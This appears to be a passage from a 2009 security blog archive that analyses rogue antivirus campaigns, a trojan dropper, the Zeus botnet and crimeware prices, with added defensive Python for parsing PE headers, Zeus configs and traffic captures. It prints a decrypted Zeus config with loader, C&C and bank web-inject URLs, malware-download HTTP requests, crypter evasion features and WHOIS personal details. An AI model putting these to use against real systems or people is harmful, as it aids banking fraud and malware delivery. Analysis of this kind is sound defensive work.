Tuesday, March 31, 2009

MALWARE INFECTION THROUGH FALSE WINDOWS SECURITY CENTER

The Windows Security Center (renamed Action Center in Windows 7, where it also covers maintenance) is a component of Windows XP from Service Pack 2, Windows Vista and Windows 7 that lets the user view the status of the computer's security settings and services. It continually monitors those settings and warns the user with a pop-up notification balloon when there is a problem.

The page below imitates that interface and shows fake scan alerts. It is being used to spread Winwebsec-family rogue antivirus trojans.



When the user first accesses the malicious page, it generates a fake virus alert:


It then asks the user to install the rogue "System Security 2009":


After infection:



More on Install.exe http://www.virustotal.com/analisis/cb066f00f4dccdd3f24f5f888843aee5

WHOIS INFORMATION:

Domain name: itsecurityscan.com

Name servers:
ns1.itsecurityscan.com
ns2.itsecurityscan.com

Registrar: Regtime Ltd.
Creation date: 2009-03-25
Expiration date: 2010-03-25

Registrant:
Jayme Millwood
Email: millwoodjaymemichael@gmail.com
Organization: Private person
Address: 1892 C Street
City: Pawtucket
State: MA
ZIP: 02860
Country: US
Phone: +1.5083997660


***** Thanks to Kalyan for his analysis *****

ARE YOU INTERESTED IN PROTECTED VIDEO CONTENT? DON'T GET INFECTED

Sites offering "protected" private videos are spreading malware. The site looks like a legitimate movie website; to see the protected content you are told to click "ENABLE VIDEO NOW", and once you click the link you are on your way to being infected.



To open the video you are told you need a secure code and an access code:





Where do you get the code? Click the "access generator". It generates the code and at the same time drops the trojan. AntiVir detects it as TR/Dropper.Gen and McAfee-GW-Edition as Trojan.Dropper.Gen.

Additional information:

File size: 88576 bytes
MD5...: 37d63ad95eae5b2810b9b860dcb03ba6

TrID..: File type identification
Win32 Executable Generic (42.3%)
Win32 Dynamic Link Library (generic) (37.6%)
Generic Win/DOS Executable (9.9%)
DOS Executable Generic (9.9%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)

PEInfo: PE Structure information

Base Data
entrypointaddress.: 0x2214
timedatestamp.....: 0x49cfb31d (Sun Mar 29 17:42:53 2009)
machinetype.......: 0x14c (I386)

Imports

kernel32.dll: ExitProcess, FreeLibrary, GetModuleHandleA, GetProcAddress, LoadLibraryA, lstrcatA, lstrcpyA, lstrlenA

More analysis: http://www.virustotal.com/analisis/e65ba59b29da0592d47c871d3261d48e
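The "Base Data" and "Imports" above are exactly what a PE header walk yields, and an import table that consists of nothing but kernel32.dll with LoadLibraryA and GetProcAddress is the profile of a packed stub that resolves its real API at run time. As an added example (not code from the original post or from VirusTotal), the following Python script parses the MZ/PE/COFF/optional headers of a constructed header-only image, prints the same fields, and applies two triage heuristics: the bare-loader import profile, and a zeroed or future TimeDateStamp, which is a trace of the header rewriting that crypters advertise (see the Crum crypter post further down this page). The constructed image, the function names and the thresholds are assumptions; the header values 0x14c, 0x49cfb31d and 0x2214 are the ones reported above.

```python
import struct
from datetime import datetime, timezone

# IMAGE_FILE_MACHINE values from the PE specification.
MACHINE_NAMES = {0x14C: "I386", 0x8664: "AMD64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def parse_pe_header(data: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> optional header
    and return the fields VirusTotal lists as 'Base Data'."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, stamp, _symtab, _nsyms, _optsize, _chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20                                  # the COFF header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]   # 0x10B = PE32, 0x20B = PE32+
    if magic not in (0x10B, 0x20B):
        raise ValueError("unexpected optional header magic %#x" % magic)
    entry = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    when = datetime.fromtimestamp(stamp, tz=timezone.utc)
    return {
        "machine": MACHINE_NAMES.get(machine, "%#x" % machine),
        "sections": nsections,
        "timestamp": stamp,
        "timestamp_utc": when.strftime("%a %b %d %H:%M:%S %Y"),
        "entry_point": entry,
        "pe32plus": magic == 0x20B,
    }


def timestamp_suspicious(stamp: int, now: int) -> bool:
    """A zeroed or future TimeDateStamp is a common trace of a crypter or packer
    rewriting the header; `now` is the analysis time as a Unix timestamp."""
    return stamp == 0 or stamp > now + 86400


def imports_look_packed(imports: dict) -> bool:
    """True for the bare-loader import profile of a packed stub: kernel32.dll only,
    LoadLibraryA and GetProcAddress present (the real API set is resolved at run
    time) and only a handful of other functions.  The limit of 12 is a heuristic."""
    funcs = {f for names in imports.values() for f in names}
    only_kernel32 = {d.lower() for d in imports} == {"kernel32.dll"}
    return only_kernel32 and {"LoadLibraryA", "GetProcAddress"} <= funcs and len(funcs) <= 12


def build_minimal_pe(machine: int, stamp: int, entry: int) -> bytes:
    """Constructed header-only PE image (no sections) so the parser can be run
    offline; it is not derived from the dropper discussed on this page."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", machine, 0, stamp, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)                                  # size of a PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Header values as reported above for the dropper; the image bytes are constructed.
    info = parse_pe_header(build_minimal_pe(0x14C, 0x49CFB31D, 0x2214))
    print(info)
    dropper_imports = {"kernel32.dll": ["ExitProcess", "FreeLibrary", "GetModuleHandleA",
                                        "GetProcAddress", "LoadLibraryA", "lstrcatA",
                                        "lstrcpyA", "lstrlenA"]}
    print("packed-looking import table:", imports_look_packed(dropper_imports))
```

The timestamp is rendered in UTC, which is why it reproduces the "Sun Mar 29 17:42:53 2009" value shown above; a build stamp that is plausible does not prove anything, but a zero or future one is cheap to check and worth an alert.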

WHOIS INFORMATION:

Registration Service Provided By: REGNAME.BIZ
Contact: +1.2014674681
Website: http://www.regname.biz

Domain Name: CUTMYHEART.COM

Registrant:
N/A
Karlos ()
Mira str 144 app. 12
Moscow
Moskovskaya oblast,987458
RU
Tel. +495.7639012

Creation Date: 27-Jul-2008
Expiration Date: 27-Jul-2009

Domain servers in listed order:
ns2.rusparters.com
ns1.rusparters.com

Status:ACTIVE

*********THANKS to our Team Lead Kalyan for his analysis **********

Monday, March 30, 2009

Financial institutions targeted by the botnet Zeus. Part two

Zeus is structured as a set of PHP modules from which it controls and carries out all the fraudulent and harmful activity it was conceived for. For example, it is very common to find files named s.php, sS.php, x.php or similar, which are the command and control (C&C) of the bot.

Once a machine is infected, Zeus downloads an encrypted .bin file (usually cfg.bin): the configuration file, a set of instructions specifying which information to collect and where to send it.

When this file is decrypted we can see its layout and the financial institutions that Zeus constantly monitors from the zombie.

When the user accesses certain forms, Zeus intercepts the browser interaction and captures all the information its botmaster needs to commit fraud.

The list of entities in Zeus's sights is really long; some of them are:

myspace.com
gruposantander.es
vr-networld-ebanking.de
finanzportal.fiducia.de
bankofamerica.com
bbva.es
bancaja.es
olb2.nationet.com
online.lloydstsb.co.uk
pastornetempresas.bancopastor.es
bancopopular.es
ebay.com
us.hsbc.com
e-gold.com
online.wellsfargo.com
wellsfargo.com
paypal.com
usbank.com
citizensbankonline.com
onlinebanking.nationalcity.com
suntrust.com
53.com
web.da-us.citibank.com
bancaonline.openbank.es
extranet.banesto.es
empresas.gruposantander.es
bbvanetoffice.com
bancajaproximaempresas.com
citibank.de
probanking.procreditbank.bg
ibank.internationalbanking.barclays.com
online-offshore.lloydstsb.com
dab-bank.com
hsbc.co.uk
bancoherrero.com
intelvia.cajamurcia.es
caixasabadell.net
areasegura.banif.es
privati.internetbanking.bancaintesa.it
iwbank.it
cardsonline-consumer.com
money.yandex.ru
e-gold.com
paypal.com

These strategies make clear that, while e-mail is still a channel used to propagate malware, today the web is the base from which mass attacks are carried out with all kinds of crimeware.

Related Information
Financial institutions targeted by the botnet Zeus. Part one - Spanish version
Zeus botnet. Mass propagation of trojan. Part two - Spanish version
Zeus botnet. Mass propagation of trojan. Part one - Spanish version


Saturday, March 28, 2009

Financial institutions targeted by the botnet Zeus. Part one

As I said in a previous post, Zeus is one of the most important zombie networks because of the large number of nodes that make it up. Although its origin dates back to late 2007, the malware is now being exploited actively and massively, expanding its range of attacks and fraudulent activities, with each node managed through a web interface.

So much so that, beyond the infection itself, its activity triggers a whole array of malicious scripts aimed at mass infection of computers through trojans that exploit various known vulnerabilities, and at phishing attacks that clone the sites of banks and global online payment systems.

Knowing that Zeus focuses to a high degree on data theft, the obvious question after reading these short paragraphs is: how does Zeus obtain the information it needs from the victim's computer?

The answer lies in its configuration file, which is encrypted. Once decrypted, its contents look like the following real example, taken from the file cfg.bin (MD5: 905dfab98b33e750bf78c8b29765279b):
Config version: 1.0.3.7
Loader url: http://yourcatfree.cn/trashes/ldr.exe
Server url: http://theyourbest.cn/rssfeederd/stat1.php
Advanced config 1: http://greatyourway.cn/trashesgg2/cfg.bin
Advanced config 2: http://theyourown.cn/trashesff1/cfg.bin
Advanced config 3: http://adviceswarning.com/trashesrr5/cfg.bin
Advanced config 4: http://ispspartners.com/trashes6/cfg.bin
Advanced config 5: http://ispscenter.com/trashesrr3/cfg.bin
Advanced config 6: http://alleips.com/trashestt3/cfg.bin
Fake 1: 0 PG http://adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|
Fake 2: 0 PG http://adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 3: 0 PG http://adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Fake 4: 0 PG http://adultfriendfinder.com/cgi-bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351|
Fake 5: 0 PG http://staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 6: 0 PG http://staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Fake 7: 0 PG http://www.adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|
Fake 8: 0 PG http://www.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 9: 0 PG http://www.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Fake 10: 0 PG http://www.adultfriendfinder.com/cgi-bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351|
Fake 11: 0 PG http://www.staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 12: 0 PG http://www.staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Inject data 1: OK
Inject data 2: OK
Inject data 3: OK
Inject data 4: OK
Inject data 5: OK
Inject data 6: OK
Inject data 7: OK
Inject data 8: OK
Inject 1: https://www.e-gold.com/acct/balance.asp*|GPL|*|*
Inject 2: https://online.wellsfargo.com/das/cgi-bin/session.cgi*|GL|*|*
Inject 3: https://www.wellsfargo.com/*|G|*|*
Inject 4: https://online.wellsfargo.com/login*|GP|*|*
Inject 5: https://online.wellsfargo.com/signon*|GP|*|*
Inject 6: https://www.paypal.com/*/webscr?cmd=_account|GL|*|*
Inject 7: https://www.paypal.com/*/webscr?cmd=_login-done*|GL|*|*
Inject 8: https://www.gruposantander.es/bog/sbi*?ptns=acceso*|GP|*|*
Done!

In this way, through the advanced configurations applied on the victim's computer, the Zeus trojan obtains sensitive information.
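The decrypted dump above has a regular shape: "Key: value" lines, where "Fake N" entries are URL-mask redirects and "Inject N" entries are URL masks with flag letters (G and P select GET and POST requests; the other letters are left uninterpreted here). The host list in Part two of this series is what you get by taking the host of every mask. As an added example that is not part of either post, the Python below parses a constructed excerpt of that dump, derives the targeted-host list, and answers the operational question of which rules the bot would apply to a given request; the mask matcher treats "*" as the only wildcard. Sample lines, function names and the flag interpretation are assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed excerpt in the shape of the decrypted cfg.bin dump above (a subset of its lines).
SAMPLE_DUMP = """\
Config version: 1.0.3.7
Loader url: http://yourcatfree.cn/trashes/ldr.exe
Server url: http://theyourbest.cn/rssfeederd/stat1.php
Advanced config 1: http://greatyourway.cn/trashesgg2/cfg.bin
Fake 1: 0 PG http://adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|
Inject data 1: OK
Inject 1: https://www.e-gold.com/acct/balance.asp*|GPL|*|*
Inject 2: https://online.wellsfargo.com/das/cgi-bin/session.cgi*|GL|*|*
Inject 6: https://www.paypal.com/*/webscr?cmd=_account|GL|*|*
Inject 8: https://www.gruposantander.es/bog/sbi*?ptns=acceso*|GP|*|*
Done!
"""

FAKE_RE = re.compile(r"(\d+)\s+([A-Z]+)\s+(.*)")


def parse_config(text: str) -> dict:
    """Parse the 'Key: value' dump into C&C/update URLs, redirect ('Fake') rules
    and web-inject rules.  Flag letters G and P select GET/POST; any other
    letters are stored verbatim rather than interpreted."""
    cfg = {"version": None, "urls": {}, "fakes": [], "injects": []}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if not sep:
            continue                                  # 'Done!' and blank lines
        if key == "Config version":
            cfg["version"] = value
        elif key.endswith(" url") or key.startswith("Advanced config"):
            cfg["urls"][key] = value
        elif key.startswith("Fake "):
            m = FAKE_RE.match(value)
            if m and m.group(3).count("|") >= 2:
                mask, redirect, rule_id = m.group(3).split("|")[:3]
                cfg["fakes"].append({"mask": mask, "redirect": redirect,
                                     "id": rule_id, "flags": set(m.group(2))})
        elif key.startswith("Inject "):
            parts = value.split("|")
            if len(parts) >= 2:                       # skips the 'Inject data N: OK' lines
                cfg["injects"].append({"mask": parts[0], "flags": set(parts[1])})
    return cfg


def mask_to_regex(mask: str):
    """Zeus masks use '*' as the only wildcard; everything else is literal."""
    return re.compile("^" + ".*".join(re.escape(p) for p in mask.split("*")) + "$", re.I)


def matching_rules(cfg: dict, url: str, method: str = "GET") -> list:
    """Rules the bot would apply to a request for `url` made with HTTP `method`."""
    hits = []
    for kind in ("fakes", "injects"):
        for rule in cfg[kind]:
            if method[0].upper() in rule["flags"] and mask_to_regex(rule["mask"]).match(url):
                hits.append((kind, rule))
    return hits


def targeted_hosts(cfg: dict) -> list:
    """The kind of host list printed in Part two, derived from the rule masks."""
    hosts = {urlsplit(r["mask"]).hostname for k in ("fakes", "injects") for r in cfg[k]}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_DUMP)
    print("C&C / update URLs:", cfg["urls"])
    print("targeted hosts:", targeted_hosts(cfg))
    for kind, rule in matching_rules(cfg, "https://www.paypal.com/us/cgi-bin/webscr?cmd=_account"):
        print(kind, rule["mask"], sorted(rule["flags"]))
```

Running it against a real decrypted config is the quickest way to turn a cfg.bin into blocklist material (the loader, server and "Advanced config" URLs) and into a list of which of your own login URLs the bot is watching.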


# Jorge Mieres

Thursday, March 26, 2009

Automating anti-analysis processes through crimeware

Automating malicious code is a way of life and a profitable business for its creators, who every day must focus their efforts on devising new "tools" that can "jump" the detection methods of antivirus signatures.

New and increasingly professional "proposals" constantly appear that help delay the detection of malicious code through anti-analysis techniques and, at the same time, increase the developers' profits.

Polymorphic Cryptor Crum is one of many programs in this category. It is a program used to encrypt malware, developed in Russia for people on the mischievous side of the field who want to broaden their returns.


This is a new version of the crypter, 1.1, which adds capabilities for handling polymorphic malicious code.

Among the features claimed for this polymorphic implementation are:
  • Use of randomization
  • Encryption of imports and resources
  • 128-bit encryption for each section
  • Overwriting of the "Rich" and "Time/Date Stamp" fields in the file header
  • Anti-debugger capabilities
  • Prevention of memory dumps
  • Refusal to run in controlled (analysis) environments
  • Changing or removing the icon of the malicious binary
These are only some of the functions the program offers, but they are enough to show the degree of professionalism and dangerousness that, in this case, Russian developers have reached in malware creation, which is disturbing.

This implementation costs USD 100 on the black market. To complete the set of applications of this style, the same author also offers a joiner (used to merge files) called Crum Joiner Polymorphic for "only" USD 50, and access to its updates for USD 20.

The interface of this program, which can merge several files, for example a .jpg with an .exe binary, is as follows:

In this case, some of the features the application includes are:
  • Polymorphic capabilities
  • Unlimited number of files joined
  • Support for multiple file extensions such as .doc, .mp3, .avi, .jpg, .bmp and .exe
  • File encryption of 256 bytes
  • Ability to carry not only .exe files but also .dll files
In both cases the author recommends certain "security measures" to protect the "integrity" of the product: never submit the application to services such as VirusTotal, encrypt the files as instructed, and do not share any of the components that make up the applications.

Related Information
Russian prices of crimeware - Spanish version

Creating Online polymorphic malware based PoisonIvy - Spanish version

# Jorge Mieres

Sunday, March 22, 2009

Campaign scareware infection through false Windows Explorer

Deception strategies are the main feature scareware uses to generate fear in the user and make sure its installer gets executed. The excuses used are numerous, some more appealing than others, and the effort put into devising ever more sophisticated strategies keeps increasing.

In this case the deception consists of presenting a supposed scan of the computer that always ends up finding infections, then offering the download of the alleged security tool that will solve them. All completely false.

When the user first accesses the malicious page, an alert warns that the computer may have been the victim of malicious code.

Then a simulated scan of the computer is shown, represented by a fake Windows Explorer and an animated GIF with a progress bar, after which a popup window lists the names of the alleged threats found on the system.

This image, which offers two options ("Remove all" and "Cancel"), is another layer of deceit: no matter which part of the image is clicked, the effect is the same, the download of the malware installer, a file called install.exe with MD5 8eed59709de00e8862d6ce3d5e19cb4a.

Some of the web addresses actively used in this malicious activity include:

stabilityaudit.com (209.44.126.22)
websscan.com
goscanbay.com (78.159.101.27)
goanyscan.com
goscanever.com
goscanfuse.com
goscanit.com
goscanonly.com
goscanslot.com
gowayscan.com
in4co.com
in4ik.com
megascan4.com
www.goscanonly.com
www.homescan4.com
easywinscanner17.com (209.249.222.48)
fast-antimalware-scanner.com (194.165.4.7)
fastantimalwarescan.com (78.47.91.153)

Its creators, seeking to refine the campaign and reach as much of the "public" as possible, deploy the infection strategy in several languages, even serving different variants of the malware. In this way the scareware creators try to cover the two most widely used languages in the world, English and Spanish.

Spanish version

# Jorge Mieres

Friday, March 20, 2009

uCon 2009 Materials/Archives

For those of you who were unable to attend uCon 2009, speaker presentations from this year's event have been made available online.

Materials can be found at http://www.ucon-conference.org/archives.php.

We also would like to thank all of you who joined us at the conference and helped us make uCon a blast.

- EF

Security Research: Is it really worth it?

Big organizations are copying open security research and selling it to their customers openly. This is not something to make accusations about, but it is a shame for our community.

http://blog.trendmicro.com/waledac-spamming-madness/ was released on March 20th, 2009. We had released this research on March 15th, 2009 [it can be found at http://evilfingers.blogspot.com/2009/03/pharmacy-spam-strikes-google.html]. Though, once again, we were not addressed.

It's a SHAME for our community that such big organizations take open research publications and convert them into their own work.

- EF

How does security research really work?

Panda Security has been publishing blog posts on what the EvilFingers blog had released before them, by a minimum of 24 hours or so.

The following samples show how Panda Security has taken existing content, modified the text and never said a single word about EvilFingers. Guess this is what "Research" is all about:

http://pandalabs.pandasecurity.com/archive/Have-you-ever-heard-the-term-_2200_Rickrolling_22003F00_-Malware-distributors-have_2E002E002E00_.aspx


http://pandalabs.pandasecurity.com/archive/Metatags-in-malware-websites.aspx


http://pandalabs.pandasecurity.com/archive/Metatags-in-malware-websites_3A00_-II-part.aspx


http://pandalabs.pandasecurity.com/archive/Waledac-Storm-worm_2E002E002E00_-New-Target_3A00_-Valentine_1920_s-day.aspx

http://pandalabs.pandasecurity.com/archive/Happy-Saint-Valentine_2100_.aspx

We sent an email to legal team of Panda Security, but never got a single response.

SANS published a statement that their ISC reader found something: http://isc.sans.org/diary.html?storyid=5917

The ISC reader did not mention that EvilFingers is where he found the source of the document about Oscar going wild. Hence, our members wrote comments stating that this could be found on the EvilFingers blog at the appropriate link. But the SANS administrator who moderates the comments rejected the comment that gave the true source of this blog post.

If you really need to make money out of free security research done by the open world, at least credit the people who really deserve it. All that researchers around the world require is recognition of their work. If you steal that research and convert it into your own discovery, does that show any morals on your part?

Thanks to our security researcher Kalyan, who found these links and contacted SANS to publish the true source of such research.

Contact us if you have any questions: contact.fingers @ gmail.com

- Anushree

Thursday, March 19, 2009

Syscall Handler Checker [SHC]

Our 3rd Linux kernel rootkit analytics tool has been released. It can be found at the following link:

http://www.rootkitanalytics.com/kernelland/syscall-handler-checker.php

- EF

Monday, March 16, 2009

HITB09 Agenda + Noteworthy Presentations

Agenda: http://conference.hitb.org/hitbsecconf2009dubai/agenda.htm

Keynote 1 - Philippe Langlois (Founder, Qualys / Intrinsec / TSTF)
"From Hacking, Startups to HackLabs: Global Perspective and New Fields"

Keynote 2 - Mark Curphey (Director CISG, Microsoft Corp)
"Security Cogs and Levers"

Other kick-ass presentations:

# Cross Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions - Chris Evans and Billy Rios

# VBootKit 2.0 - Attacking Windows 7 via Boot Sectors - Vipin & Nitin Kumar

# The Reverse Engineering Intermediate Language REIL and its Applications - Sebastian Porst

# Pickpocketing mWallets: A Guide to Looting Mobile Financial Services - The Grugq

# Psychotronica: Exposure, Control, and Deceit - Nitesh Dhanjani

# NKill - The Internet Killboard - Anthony 'kugutsumen' Zboralski

This one is REALLY going to be big news - it's a new tool which gives attackers the ability to discover interesting relationships between seemingly unrelated hosts and companies and to pull vulnerable hosts for a specific domain, company or even an entire country!

EvilFingers team:

If you would like to attend HITB, kindly send us an email at contact.fingers @ gmail.com and we will work out a special deal for your conference ticket. This also depends on how much volunteering you have done, how long you have been with EF, and so on. Kindly contact us for more details.

- EF

Evading Web XSS Filters through Word (Microsoft Office and Open Office) in Enterprise Web Applications

Abstract: This paper sheds light on the hyperlinking issues observed during penetration testing of web-based enterprise applications. The technique can be used to bypass standard XSS filters by creating a malicious Microsoft Word document.

Author: Aditya K Sood

DOWNLOAD HERE

- EF

Sunday, March 15, 2009

Pharmacy spam strikes google

"Are You In Need Of The Cheapest Drugs"

A large percentage of the spam arriving in inboxes belongs to the pharma category. Taking advantage of the fact that a number of legitimate internet pharmacies offer discount prices, the spammers go after people who wish to avoid some of the legal restrictions on drug purchases, for a number of reasons:

Some people want a lower-cost source of medications. Most people in the US know that many expensive medications can be obtained in Canada at a lower cost, and they assume anything called "Canadian" is a bargain.
Some people cannot obtain a prescription for a maintenance drug because they are not keeping physician appointments or undergoing the necessary monitoring and testing.
Some people want drugs that physicians are unwilling to prescribe for them, such as narcotics or unnecessary antibiotics.

All the Google-redirected sites are fake pharmacy sites. Pharmacy spam is normally e-mail spam, but this time it has hit Google Docs as well. These fake pharmacy sites are used by the Storm trojan.

Ex:hxxp://docs.google.com/Doc?id=dgc9grq7_2ck5mp3fc

This website abuses the Visa, MasterCard, American Express, JCB and Diners Club logos.

The links in the spam e-mails redirect to .cn domains. Looking at the whois information:

pridewit.com = [219.152.120.12]
Domain Name : pridewit.com
PunnyCode : pridewit.com
Registrant
Organization : Song Jiacheng
Name : SongJiacheng
Address : Guangdong Shangshui
City : Shangshui
Province/State : Guangdong
Country : cn
Postal Code : 528133

eagerfree.com = [58.20.140.5 ]
Domain Name : eagerfree.com
PunnyCode : eagerfree.com
Registrant:
Organization : li chun hua
Name : li chun hua
Address : huang ming shan lu21
City : JZ
Province/State : LN
Country : CN
Postal Code : 161002

Most of the websites are registered in China.

Google search Tags:

intitle:Are You In Need Of The Cheapest Drugs
intitle:Are You Looking For The Cheapest Medications


intitle:Special Offer: Revatio 20 mg from $0.97 per pill


Thanks to Spamtrackers for more information on pharmacy spam:
http://spamtrackers.eu/wiki/index.php?title=Canadian_Pharmacy


# Kalyan

Saturday, March 14, 2009

Rootkit Analytics: Finally, the day has come...

www.RootkitAnalytics.com was released early this morning at 4AM EST. In this release we have:
--> 2 Linux kernelland anti-rootkits
--> 1 Windows userland anti-rootkit

Besides the above tools, we have released a few introductory pages on kernelland and userland rootkits. More coming in the next release, stay tuned...

Snapshot of RootkitAnalytics...

Friday, March 13, 2009

Russian prices of crimeware

Seeing how many Russian domains are created to spread malware, and the wide variety of applications designed there to commit all kinds of crimes in pursuit of the most valuable commodity, information, one can imagine Russia as something like the world Gibson describes in Neuromancer, where old dark alleys are used for the illegal sale and rental of all kinds of programs designed to break security protections.

Cyber-criminals and the black market in crimeware seem to be the order of the day in Russia, so I want to give some numbers that show what it may cost to prepare attacks using the large number of "resources" available, mercenary-style, to the highest bidder.

Sploit25
Contains various crimeware to exploit vulnerabilities in Internet Explorer 6 and 7 and in PDF files. There is a Lite version for USD 1500 and a Pro version for USD 2500.

Unique Sploits Pack
Another crimeware package containing several exploits for different vulnerabilities. Its price is USD 600; access to updates costs USD 100 and an encryption module USD 50.

Neon Exploit System
A set of exploits for vulnerabilities in Microsoft platforms and widely used applications. The price of this crimeware is USD 500.

XS[S]hkatulka
A set of scripts designed to steal webmail passwords through XSS. According to its creators, "this application is ideal for starting to earn money by providing services to obtain the passwords of mail accounts". As a researcher in "Information Research" :-) Its price is USD 110.

Cripta Zeus(a)
A service for encrypting the trojans that recruit zombie PCs into Zeus botnets. The "services" offered are:
  • Individual crypt of your .exe, first time: USD 49
  • Individual crypt of your .exe, re-encrypted every two hours: USD 46
  • Individual crypt of your .exe, re-encrypted every three hours: USD 43

LeFiesta Pack
One of the best-known crimeware kits. Like other similar programs it is written in PHP and is used to exploit vulnerabilities through techniques such as drive-by download, scripting, etc. It is currently used by the Zeus botnet. The latest version costs USD 1000.

YES Exploit System
Another crimeware kit designed to exploit vulnerabilities through exploits and scripts. Its price is USD 600.

PoisonIvy Polymorphic Online Builder
Crimeware to generate variants of the PoisonIvy trojan online. Its price is USD 500.

FriJoiner Small and Private
An application to merge executable files. Such applications are widely used by malware distributors to keep the malicious code from being detected. The Small version costs USD 10 and the Private version USD 15.



Genom iframer
An application designed to automate the injection of iframe tags into vulnerable sites. Its price is USD 40.

CRUM Cryptor Polymorphic
A crypter with polymorphic features designed to keep antivirus companies from detecting the malware. It costs USD 100.

This is just a small list, a very small percentage of the quantity and variety of crimeware applications available.

Most attacks that use the Internet as their base are carried out with programs of this style, but we must keep in mind that the better informed we are and the better we use security technologies, the higher the level of protection in our information environments.

Related Information
Unique Sploits Pack. Crimeware to automate the exploitation of vulnerabilities - Spanish version
Phishing Kit. Creator automatic of fraudulent sites - Spanish version
Analysis of an attack of web-based malware - Spanish version
Creating Online polymorphic malware based PoisonIvy - Spanish version


# Jorge Mieres

Wednesday, March 11, 2009

Aggressive strategy of XP Police Antivirus infection. Second part

From the moment XP Police Antivirus infects the machine, it starts displaying a series of false alerts about supposed infections, among other things.

But, completely transparently to the user, it performs a series of actions to complete the scareware's work. Listening to the traffic, we see the following components being downloaded:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

The downloaded setupc.dat is not a data file but a compressed archive holding a copy of the other files, which are decompressed into C:\Program Files\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) is a runtime packer used to compress the malware and try to avoid detection by antivirus programs.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2

GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

The JavaScript file window.js displays a pop-up window with the caption "Thank you for Installation!"


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page for purchasing the scareware, where the victim's personal and financial information is requested. It is a scam/phishing page.

The maneuvers used by malicious code are becoming more aggressive and effective because, as we have seen, the installer downloaded in the first instance is only one piece of the puzzle, from which the scareware fetches the other pieces.
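The captured requests above carry more than the download hosts: the component downloads use a made-up "MS_Update32" agent, the landing-page fetch uses "wget 3.0" (real wget identifies itself as "Wget/<version>", and no 3.0 existed), and the same numeric id travels in the URL and in the cookie. As an added example that is not part of the original post, the Python below parses a constructed capture in the same shape as the one above, tolerates the interleaved response blocks and body bytes, and produces the alerts a proxy or IDS analyst would want. The agent strings and hosts are the ones shown above; the triage rules, the guess that the id is an affiliate or campaign identifier, and the function names are assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed capture in the shape of the requests above (header lines collapsed).
SAMPLE_CAPTURE = """\
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/octet-stream
Content-Length: 2746314

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

GET /js/window.js HTTP/1.1
Referer: http://www.xp-police-09.com/installed.php?id=108
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Cookie: id=108

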